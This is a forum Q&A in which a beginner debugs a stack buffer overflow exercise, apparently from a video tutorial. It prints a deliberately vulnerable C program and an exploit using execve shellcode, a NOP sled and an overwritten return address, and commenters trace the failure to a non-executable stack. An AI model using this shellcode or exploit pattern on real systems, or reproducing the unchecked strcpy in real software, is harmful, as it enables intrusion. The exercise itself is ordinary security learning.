# Beginner buffer overflow - why isn't my shellcode executing?

Tags: buffer-overflow, shellcode

I'm following the video here: https://www.youtube.com/watch?v=N0DBu3TGejI

ExploitMe.c

```
#include<stdio.h>
#include<string.h>

main(int argc, char **argv)
{
        char buffer[80];

        strcpy(buffer, argv[1]);

        return 1;
}
```

HackYou.c

```
#include<stdio.h>
#include<stdlib.h>
#include<string.h>

// shellcode ripped from http://www.milw0rm.com/shellcode/444

char shellcode[]=
"\x31\xc0"                      // xorl         %eax,%eax
"\x50"                          // pushl        %eax
"\x68\x6e\x2f\x73\x68"          // pushl        $0x68732f6e
"\x68\x2f\x2f\x62\x69"          // pushl        $0x69622f2f
"\x89\xe3"                      // movl         %esp,%ebx
"\x99"                          // cltd
"\x52"                          // pushl        %edx
"\x53"                          // pushl        %ebx
"\x89\xe1"                      // movl         %esp,%ecx
"\xb0\x0b"                      // movb         $0xb,%al
"\xcd\x80"                      // int          $0x80
;

char retaddr[] = "\x08\xf3\xff\xbf";

#define NOP 0x90


main()
{
        char buffer[96];

        memset(buffer, NOP, 96);

        memcpy(buffer, "EGG=", 4);

        memcpy(buffer+4, shellcode, 24);

        memcpy(buffer+88, retaddr, 4);
        memcpy(buffer+92, "\x00\x00\x00\x00", 4);

        putenv(buffer);

        system("/bin/sh");

        return 0;

}
```

I run ./HackYou, in that environment there is an enviroment variable named $EGG that is used as an argument to the ExploitMe.c. $EGG contains: 24 bytes shell code, 60 bytes nop, and 4 bytes to override the RET address for a total of 88 bytes (Buffer + EBP + RET)

This screenshot contains the information you need to know:

[image]

On ExploitMe.c, I break on line 8. The first thing I print is the stack. 0x00881d36 is the RET address.

Then I print argv[1](https://i.stack.imgur.com/nGGCm.png), as you can see it is 22 words. It will overwrite the Buffer+EBP+RET exactly. The start of the buffer variable is at 0xbffff308 (ESP+8), so I add that into the end of the payload.

Then I step. The RET has been perfectly overwritten with the buffer memory address.

It should return to the beginning of the buffer and start executing my shell code. All seems fine to me, but instead of giving me a shell, it gives me a segmentation fault.

What's going on?

Thank you.

Comment: When the debuggee is suspended at `return 1;`, what's the disassembly for the code at `$eip`?

Comment: 100% w/o reading the post. Check memory region for executable flags, dep kills most old tutorials.

Comment: https://i.imgur.com/hPpxT3E.png

Comment: @Stolas, I've compiled with -fno-stack-protector

Comment: Did you compiled it with executable stack ? Check it with [checksec.sh](https://github.com/slimm609/checksec.sh) script. And, try to compile it with the option `-z execstack`.

Comment: That fixed it, thank you. My fault. I thought -fno-stack-protector turns DEP off?

Comment: Without consulting the documentation (so i may be wrong) i think  -fno-stack-protector turns off the canary checking, but has nothing to do with segment flags.

Comment: @MarkHoglund Can you post the answer and accept this, this way we can get the Question / Answer Ratio up.

Comment: Yeah sure, done :)

Answer (score 0, accepted):

When compiling I did not disable the stack smashing protection. Compiling with -z execstack fixed this.